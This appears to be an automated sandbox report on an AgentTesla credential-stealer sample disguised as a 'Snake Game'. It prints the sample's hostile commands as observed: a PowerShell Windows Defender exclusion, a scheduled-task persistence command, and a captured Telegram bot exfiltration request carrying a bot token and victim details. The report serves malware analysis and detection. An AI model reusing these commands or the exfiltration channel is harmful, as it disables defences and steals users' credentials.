                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220504102609..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 088753 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\gfLnSNNH.exe..Process ID: 4184..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220504102609..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\gfLnSNNH.exe..**********************..Windows PowerShell transcript start..Start time: 20220504102958..Username: computer\user..RunAs User: computer\user..C
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.672095818652826
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      File size:715264
                                                      MD5:b78eed700665bf868771e371d2622000
                                                      SHA1:48daa093155e9eaa563f6eb537a57f940f2aa6c6
                                                      SHA256:9eeac4773d7f0e7f4303baed25c04f0b138e55f9fa7e7c718e3e6599a2e41513
                                                      SHA512:c8a943811ba8173a49941a85803a5dc0084c4eab90d7a79f3e4115992ffe6f115237b0b56e85aaaf940f6d2e6a1b1fac31541f32554c799bd259bcb3e5873e58
                                                      SSDEEP:12288:+V2L2Ij3hxwDvVbyP8wqEBI1sIAzYy3/w+8RqbVVte2moi2bOxNtbs5:M2p3MDvVmkwqYnIA/ItWVVtX
                                                      TLSH:6BE40211B502E7B9CA3C07F2A136036013F23EBE9181E6197ED477CA25B5B751E05EAB
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0......Z......z.... ........@.. .......................@............@................................
                                                      Icon Hash:e0c0c68e8e9cfc71
                                                      Entrypoint:0x49ac7a
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0xA6E9CACE [Fri Sep 27 08:07:42 2058 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9ac280x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x15640.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x9ac0c0x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x98c800x98e00False0.889864830335data7.83655168109IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x9c0000x156400x15800False0.424725199855data5.73692616532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xb20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x9c1c00x10828dBase III DBT, version number 0, next free block index 40
                                                      RT_ICON0xac9e80x25a8data
                                                      RT_ICON0xaef900x10a8data
                                                      RT_ICON0xb00380x468GLS_BINARY_LSB_FIRST
                                                      RT_GROUP_ICON0xb04a00x3edata
                                                      RT_VERSION0xb04e00x348data
                                                      RT_MANIFEST0xb08280xe15XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightCopyright HP Inc. 2020
                                                      Assembly Version1.0.0.0
                                                      InternalNameHijriCalen.exe
                                                      FileVersion1.0.0.0
                                                      CompanyNameHP Inc.
                                                      LegalTrademarks
                                                      Comments
                                                      ProductNameSnake Game
                                                      ProductVersion1.0.0.0
                                                      FileDescriptionSnake Game
                                                      OriginalFilenameHijriCalen.exe
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 4, 2022 10:26:28.191567898 CEST49751443192.168.2.3149.154.167.220
                                                      May 4, 2022 10:26:28.191625118 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:28.191714048 CEST49751443192.168.2.3149.154.167.220
                                                      May 4, 2022 10:26:28.233109951 CEST49751443192.168.2.3149.154.167.220
                                                      May 4, 2022 10:26:28.233153105 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:28.302416086 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:28.302551985 CEST49751443192.168.2.3149.154.167.220
                                                      May 4, 2022 10:26:28.311028004 CEST49751443192.168.2.3149.154.167.220
                                                      May 4, 2022 10:26:28.311042070 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:28.311305046 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:28.520508051 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:28.520651102 CEST49751443192.168.2.3149.154.167.220
                                                      May 4, 2022 10:26:28.695822001 CEST49751443192.168.2.3149.154.167.220
                                                      May 4, 2022 10:26:28.722513914 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:28.725270033 CEST49751443192.168.2.3149.154.167.220
                                                      May 4, 2022 10:26:28.768513918 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:29.163554907 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:29.163714886 CEST44349751149.154.167.220192.168.2.3
                                                      May 4, 2022 10:26:29.163834095 CEST49751443192.168.2.3149.154.167.220
                                                      May 4, 2022 10:26:29.164742947 CEST49751443192.168.2.3149.154.167.220
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 4, 2022 10:26:28.136961937 CEST5742153192.168.2.38.8.8.8
                                                      May 4, 2022 10:26:28.154877901 CEST53574218.8.8.8192.168.2.3
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      May 4, 2022 10:26:28.136961937 CEST192.168.2.38.8.8.80xff4eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      May 4, 2022 10:26:28.154877901 CEST8.8.8.8192.168.2.30xff4eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                      • api.telegram.org
                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.349751149.154.167.220443C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-04 08:26:28 UTC0OUTPOST /bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da2dbb979928b4
                                                      Host: api.telegram.org
                                                      Content-Length: 999
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      2022-05-04 08:26:28 UTC0INHTTP/1.1 100 Continue
                                                      2022-05-04 08:26:28 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 32 64 62 62 39 37 39 39 32 38 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 34 39 32 33 33 37 33 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 32 64 62 62 39 37 39 39 32 38 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 30 38 38 37 35 33 0a 4f 53 46 75 6c 6c
                                                      Data Ascii: -----------------------------8da2dbb979928b4Content-Disposition: form-data; name="chat_id"5049233732-----------------------------8da2dbb979928b4Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/088753OSFull
                                                      2022-05-04 08:26:29 UTC1INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Wed, 04 May 2022 08:26:29 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 641
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":54,"from":{"id":5187728823,"is_bot":true,"first_name":"Siberian tiger","username":"Validato_bot"},"chat":{"id":5049233732,"first_name":"Trade","last_name":"Tracker","username":"trade_track","type":"private"},"date":1651652789,"document":{"file_name":"user-088753 2022-05-04 10-47-53.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAM2YnI4taq55JHsZR6UcTna876uVVIAAuMBAAIHQpFHjU-4po0b5r0kBA","file_unique_id":"AgAD4wEAAgdCkUc","file_size":429},"caption":"New PW Recovered!\n\nUser Name: user/088753\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:10:25:46
                                                      Start date:04/05/2022
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe"
                                                      Imagebase:0x440000
                                                      File size:715264 bytes
                                                      MD5 hash:B78EED700665BF868771E371D2622000
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      Target ID:5
                                                      Start time:10:26:06
                                                      Start date:04/05/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gfLnSNNH.exe
                                                      Imagebase:0x170000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Target ID:6
                                                      Start time:10:26:06
                                                      Start date:04/05/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:7
                                                      Start time:10:26:06
                                                      Start date:04/05/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gfLnSNNH" /XML "C:\Users\user\AppData\Local\Temp\tmp20B8.tmp
                                                      Imagebase:0xc10000
                                                      File size:185856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:8
                                                      Start time:10:26:09
                                                      Start date:04/05/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:9
                                                      Start time:10:26:11
                                                      Start date:04/05/2022
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      Imagebase:0x130000
                                                      File size:715264 bytes
                                                      MD5 hash:B78EED700665BF868771E371D2622000
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low

                                                      Target ID:11
                                                      Start time:10:26:13
                                                      Start date:04/05/2022
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                                                      Imagebase:0xb00000
                                                      File size:715264 bytes
                                                      MD5 hash:B78EED700665BF868771E371D2622000
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.380187525.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000000.380187525.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.380767912.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000000.380767912.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.379680707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000000.379680707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.588935201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000002.588935201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.379081900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000000.379081900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      No disassembly